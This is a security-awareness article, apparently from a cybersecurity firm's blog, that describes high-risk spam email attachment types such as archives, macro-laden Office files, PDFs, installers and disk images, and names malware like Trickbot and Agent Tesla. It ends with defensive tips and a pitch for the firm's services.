The Most Dangerous Attachments in Spam Emails

Despite there being numerous advanced cyberattacks, threat actors still use spam emails to initiate attacks. The threat has grown more sophisticated than it was in the prime of Nigerian prince scams.

Cybercriminals send messages in the billions every day, mainly comprising trite advertising. Though annoying, these are generally innocuous. But once in a while, a message comes with a malicious file attachment.

It’s usually masked as a valuable, interesting, or critical thing: a great offer, an office document, a gift card linked to a famous company, and so on. Furthermore, malware distributors use specific pet formats. This explains the recent spike in email scams that led to the government issuing a notice and sharing tips.

Understanding the most dangerous spam email attachments and spotting the red flags can secure you from a devastating cyberattack, financial losses, and damaged reputation.

This guide explores the most dangerous attachments in spam emails today and how to react when facing a threat.

Which Are the Most Dangerous Attachments in Spam Emails?

Dangerous spam email attachments come in different forms. But here are the most hazardous and difficult-to-address attachment types:

Compressed Files

These are among the most complex malware to identify and beat because of the legitimate reason why someone would share a compressed file through email – reducing the attachment’s size. The issue with this file type is that it masquerades the package’s contents, like hazardous .exe files and other malware types.

Avoid touching attachments with .rar, .zip, .arc, or .r09 unless you’re confident that the sender has a legitimate reason for sharing the compressed file.

When sharing large files with a colleague through email, you’d rather consider services like WeTransfer and Dropbox instead. Such emails are less likely to be subjected to security software flagging.

DOC/XLSM Files Delivering Trickbot

There has been a substantial spike in tax-centred spam campaigns where cybercriminals use XLSM and DOC files to transmit the Trickbot modular, which banks Trojan. The email messages purported to feature tax-billing files and comprised office doc attachments containing a malicious macro.

This downloads and executes the payload via BitsAdmin, a genuine command-line solution for creating, downloading, or uploading tasks and monitoring progress. Following the download and execution, the Trickbot begins developing modules on your device, stealing as much critical data as possible.

First reported in 2016, Trickbot has evolved fast and now comes with advanced code-injection tricks, updated data-stealing modules, and a custom redirection approach.  

Microsoft Office Files

Microsoft Office documents, especially Excel spreadsheets (XLSM, SLSX, and XLS), Word documents (DOCX, DOC), templates, and presentations, are among the most dangerous spam email attachments. Fraudsters embed macros in these files – trivial programs within the Microsoft office file – and use them as scripts for malware downloads.

Typically, the attachments are focused on office staff, disguised as urgent messages, bills, contracts, tax notifications from senior management or government bodies. For instance, Ursnif, a banking Trojan, was sent to users in Italy disguised as a payment notice. Anyone who downloaded and opened the document then enabled macros (always disabled for security reasons) ended up with a Trojan in their device. Verifying the sender of the file can prevent you from falling victim.

PDF Files

Most people understand the vulnerabilities of macros in MS Word documents, but others are still less aware of the equally dangerous PDF file booby traps. Nevertheless, a malware attack can be transmitted and initiated through PDFs. In addition, spammers use the format to develop and run JavaScript files and sometimes hide phishing links in these documents.

For instance, in one campaign, hoaxers tricked users into clicking on a “secure” page. Here, they were prompted to submit their login details for their respective American Express accounts. But, instead, the details ended up in spammers’ hands.  

Dangerous Installers

Windows operating system uses the MSI installer package file format to install programs. However, cybercriminals might leverage the same capability to deploy malware to your computer. The best way to stay safe is deleting all emails with .msi attachments. If you’re using a Mac device, you’re probably accustomed to distributing software in the .dmg format. So always be wary of any attachments in this format. 

IMG and ISO Disk Images

Compared to the other spam email attachments, IMG and ISO files are the least commonly used. But cybercriminals are now paying closer attention to them. In essence, a disk image is a virtual copy of a DVD, CD, or other disk.

Fraudsters use it to transmit malware into victim’s computers. One example is Agent Tesla Trojan, a malware that actively steals user credentials. The image contains a malicious executable file that activates and installs spyware on a computer when mounted. Notably, the threat actors used ISO and DOC attachments together, most likely as a fail-safe.

How to Handle Potentially Dangerous Attachments

It’s challenging to consign every message falling in the above categories of the most dangerous attachments. But, instead of this overkill, you can easily outfox spammers by paying attention to the following simple tips:

• Never open a suspicious email from an unfamiliar sender. If you can’t explain why a particular email ended up in your inbox, you probably don’t need the message.
• If you mostly deal with correspondence from unfamiliar senders, always review senders’ addresses carefully and check the attachment name. Don’t open if you see any red flag, inconsistency, or odd thing.
• Disable macros in documents received by email. Only allow them when you have to.
• Treat every link within file attachments with caution. If there’s no reason to click on a link, then just ignore it. But if you believe that you have to follow a link, ensure you key in the relevant website’s address manually in your browser.
• Install a reliable cybersecurity solution that will alert you of dangerous attachments and block the threat. Your toll should also warn you if you attempt to load a suspicious website.

Notably, opening a spam email isn’t dangerous, provided you don’t open an attachment or click on a link. However, clicking links in texts and downloading file attachments opens users to phishing, ransomware, or malware threats.

The above tips will help you stay safe, but you can only be confident of optimal security if you partner with an experienced cybersecurity expert in your location. Speak with us to learn why you should work with experts and for apt guidance on the correct remediation steps. What’s more, you can schedule a free threat assessment for you or your organization.